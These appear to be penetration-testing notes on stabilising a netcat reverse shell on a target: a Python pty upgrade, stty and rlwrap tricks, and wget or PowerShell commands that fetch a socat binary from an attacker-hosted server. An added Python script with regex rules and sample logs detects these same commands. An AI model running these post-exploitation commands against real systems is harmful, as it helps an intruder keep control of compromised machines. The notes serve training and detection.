Netcat Shell Stabilization
Netcat shells are non-interactive and often have strange formatting errors
Only applicable to Linux boxes
Three-stage process:
Use python -c 'import pty;pty.spawn("/bin/bash")', which uses Python to spawn a better bash shell
Then use export TERM=xterm -- this will give us access to term commands such as clear
Background the shell using Ctrl + Z, back in our own terminal we use stty raw -echo; fg. This does two things:
Turns off our own terminal echo (gives us access to tab autocompletes, arrow keys, and Ctrl + C to kill processes)
Foregrounds the shell, completing the process
rlwrap is a program which gives us access to history, tab autocompletion and the arrow keys immediately upon receiving a shell
Not installed by default on Kali, so install it with sudo apt install rlwrap
To use rlwrap, invoke a slightly different listener: rlwrap nc -lvnp <port>
Prepending the netcat listener with rlwrap gives us a much more fully featured shell
When dealing with a Linux target, use the same trick as in step three of the previous technique: background the shell with Ctrl + Z, then use stty raw -echo; fg to stabilize and re-enter the shell
This technique is limited to Linux targets
First transfer a socat static compiled binary (a version of the program compiled to have no dependencies) up to the target machine
You can use a webserver on the attacking machine inside the directory containing your socat binary (sudo python3 -m http.server 80)
Then on the target machine, use the netcat shell to download the file with curl or wget (wget <LOCAL-IP>/socat -O /tmp/socat)
In a Windows environment the same can be done with PowerShell, using Invoke-WebRequest or a webrequest system class (Invoke-WebRequest -uri <LOCAL-IP>/socat.exe -outfile C:\Windows\temp\socat.exe)
With all of the above techniques, adjust your terminal tty size; stty -a prints the current settings, including rows and columns
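The target-side commands in these notes leave traces in process-creation logs. The following detection sketch is an added example, not part of the original notes. The tab-separated record format, the rule names and the SERVICE_USERS set are assumptions, and the sample records are constructed.

```python
import re
from typing import NamedTuple

# Target-side commands from these notes, as they would appear in a command line.
RULES = [
    ("pty_spawn_upgrade", re.compile(r"python[\d.]*\s+-c\s+.*import\s+pty.*pty\.spawn\(")),
    ("socat_download_tmp", re.compile(r"\b(?:wget|curl)\b.*/socat\b.*\s-[oO]\s*/tmp/")),
    ("socat_download_win", re.compile(r"(?i)invoke-webrequest\b.*socat\.exe.*-outfile\s+\S*\\temp\\")),
]
# Assumption: accounts that should never start an interactive shell on this host.
SERVICE_USERS = {"www-data", "nginx", "apache", "tomcat"}

class Hit(NamedTuple):
    line_no: int
    user: str
    rule: str
    severity: str

def scan(log_text: str) -> list[Hit]:
    """Scan 'time<TAB>user<TAB>cmdline' records and return every rule match."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        parts = line.split("\t", 2)
        if len(parts) != 3:
            continue  # skip malformed records instead of crashing
        _, user, cmdline = parts
        for name, rx in RULES:
            if rx.search(cmdline):
                # The same command is more alarming from a service account.
                sev = "high" if user in SERVICE_USERS else "medium"
                hits.append(Hit(n, user, name, sev))
    return hits

# Constructed sample records (not real telemetry); 192.0.2.10 is a documentation address.
SAMPLE = "\n".join([
    "2024-01-01T10:00:01Z\twww-data\tpython -c 'import pty;pty.spawn(\"/bin/bash\")'",
    "2024-01-01T10:00:40Z\twww-data\twget 192.0.2.10/socat -O /tmp/socat",
    "2024-01-01T10:02:00Z\talice\tpython3 -c 'import json; print(json.dumps({}))'",
    "2024-01-01T10:03:00Z\talice\tapt install socat",
    "2024-01-01T10:04:00Z\tsvc_web\tpowershell Invoke-WebRequest -uri 192.0.2.10/socat.exe "
    "-outfile C:\\Windows\\temp\\socat.exe",
])

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The stty raw -echo; fg and rlwrap steps run on the listener side, so they do not appear in the target's process logs; only the pty.spawn call and the socat download do.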